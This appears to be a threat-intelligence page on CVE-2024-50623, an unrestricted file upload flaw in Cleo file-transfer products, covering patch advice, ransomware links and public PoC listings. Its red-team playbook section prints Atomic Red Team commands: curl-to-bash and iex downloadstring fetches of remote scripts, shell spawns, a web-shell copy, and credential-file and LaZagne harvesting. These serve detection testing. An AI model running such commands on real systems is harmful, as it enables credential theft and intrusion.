CVE-2024-50623
Overview
This vulnerability is an unrestricted file upload and download flaw affecting Cleo Harmony, VLTrader, and LexiCom products prior to version 5.8.0.21. The root cause lies in insufficient validation and access controls on file synchronization endpoints, allowing arbitrary file paths to be specified. The affected component is the synchronization feature handling file transfer requests without proper sanitization of user-supplied parameters.
Vulnerability Description
In Cleo Harmony before 5.8.0.21, VLTrader before 5.8.0.21, and LexiCom before 5.8.0.21, there is an unrestricted file upload and download that could lead to remote code execution.
Impact
An unauthenticated attacker can exploit this vulnerability to upload and download arbitrary files on the affected systems, enabling remote code execution. This allows full system compromise, including potential data exfiltration, system manipulation, and lateral movement within the network. No user interaction or credentials are required, making exploitation straightforward and increasing the likelihood of severe operational disruption and data breaches.
Solution
Apply the vendor-provided patch by upgrading Cleo Harmony, VLTrader, and LexiCom to version 5.8.0.21 or later as detailed in the Cleo Product Security Advisory (https://support.cleo.com/hc/en-us/articles/27140294267799-Cleo-Product-Security-Advisory). Follow the vendor’s instructions for patch deployment to ensure the synchronization component properly validates and restricts file operations. No alternative workarounds are specified in the advisory.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
Cleo File Transfer Software Zero-Day Exploits (CVE-2024-50623 & CVE-2024-55956)
|
MEDIUM | — | correlation_misp |
|
clop
|
LOW | 1254 | Chain Inference |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability present in Cleo Harmony, VLTrader, and LexiCom versions prior to 5.8.0.21 is characterized by unrestricted file upload and download capabilities. This flaw allows an attacker to upload malicious files to the server, which can subsequently be executed to gain unauthorized control over the system. The lack of proper validation and sanitization of file types and content means that an attacker can leverage this weakness to introduce executable scripts or binaries, leading to potential remote code execution. This vulnerability is particularly severe due to its high CVSS score of 9.8, indicating a critical risk that organizations must address promptly.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a malicious file, such as a web shell or a script, and upload it to the server using the file upload functionality. Once the file is successfully uploaded, the attacker can execute it by accessing the appropriate URL, effectively taking control of the server. Additionally, if the server is configured to allow file downloads without proper authentication or authorization checks, an attacker could exploit this to download sensitive files or execute further attacks. Scenarios may include data exfiltration, lateral movement within the network, or deploying additional malware, thereby escalating the impact of the initial breach.
The real-world implications of this vulnerability are significant, particularly for organizations relying on the affected products for data transfer and management. Given the critical nature of file transfers in business operations, a successful exploitation could lead to severe data breaches, loss of sensitive information, and disruption of services. The potential for remote code execution means that attackers could not only access sensitive data but also manipulate or destroy it, leading to reputational damage and financial losses. Furthermore, organizations may face regulatory repercussions if they fail to protect sensitive data adequately, resulting in additional legal and compliance costs.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regularly updating software to the latest versions is crucial, as vendors often release patches that address known vulnerabilities. Additionally, organizations should employ web application firewalls (WAFs) to filter and monitor HTTP traffic, which can help detect and block malicious file uploads. Implementing strict file validation and sanitization processes is essential to ensure that only safe file types are accepted. Furthermore, organizations should conduct regular security assessments and penetration testing to identify and remediate vulnerabilities proactively.
In conclusion, the unrestricted file upload and download vulnerability in Cleo Harmony, VLTrader, and LexiCom poses a critical threat to organizations utilizing these products. The potential for remote code execution highlights the need for immediate action to mitigate risks. By adopting robust security measures, including timely updates, effective monitoring, and stringent file handling procedures, organizations can significantly reduce their exposure to this and similar vulnerabilities, safeguarding their data and maintaining operational integrity.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2024-50623, indicating increased adversary interest and exploitation attempts targeting Cleo Harmony, VLTrader, and LexiCom products. This uptick in telemetry is accompanied by the emergence of multiple new proof-of-concept exploits publicly available on GitHub, broadening the attack surface and lowering the barrier for threat actors to weaponize this vulnerability. Additionally, the continued association of this vulnerability with ransomware groups, including Clop, underscores its operationalization in ransomware campaigns, elevating the risk of impactful post-exploitation scenarios such as data encryption and extortion. Although the EPSS score remains high and stable, the qualitative increase in exploitation attempts and the expanding exploit toolkit signify a heightened threat environment. For defenders, this means that the window for effective mitigation is narrowing as adversaries gain easier access to reliable exploit code and integrate it into ransomware operations. Consequently, the threat level for organizations using affected Cleo products should be considered elevated, warranting increased vigilance and prioritization in defensive postures.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cleo | Harmony | All |
cpe:2.3:a:cleo:harmony:*:*:*:*:*:*:*:*
|
|
|
Cleo | Lexicom | All |
cpe:2.3:a:cleo:lexicom:*:*:*:*:*:*:*:*
|
|
|
Cleo | Vltrader | All |
cpe:2.3:a:cleo:vltrader:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Cleo LexiCom, VLTrader, and Harmony Unauthenticated Remote Code Execution
exploits/multi/http/cleo_rce_cve_2024_55956
|
sfewer-r7, remmons-r7 | Unknown | - | View |
GitHub PoCs (4)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
watchtowrlabs/CVE-2024-50623
Cleo Unrestricted file upload and download PoC (CVE-2024-50623)
|
watchtowrlabs | 25 | 7 | 2024-12-11 | View |
|
verylazytech/CVE-2024-50623
CVE-2024-50623 POC - Cleo Unrestricted file upload and download
|
verylazytech | 7 | 3 | 2024-12-23 | View |
|
iSee857/Cleo-CVE-2024-50623-PoC
Cleo 远程代码执行漏洞批量检测脚本(CVE-2024-50623)
|
iSee857 | 5 | 0 | 2024-12-31 | View |
|
congdong007/CVE-2024-50623-poc
|
congdong007 | 0 | 0 | 2025-04-01 | View |
Ransomware Groups 2
Threat Feed
11 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability. Tools: Cobalt Strike, PowerShell Empire, TinyMet (1254 known victims)
Ransomware group known to exploit this vulnerability. Tools: Cobalt Strike, PowerShell Empire, TinyMet (1254 known victims)
Ransomware group known to exploit this vulnerability
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
30%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-50623 |
| support.cleo.com |
GitHub CVE
|
https://support.cleo.com/hc/en-us/articles/27140294267799-Cleo-Product-Security-Advisory |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-50623 |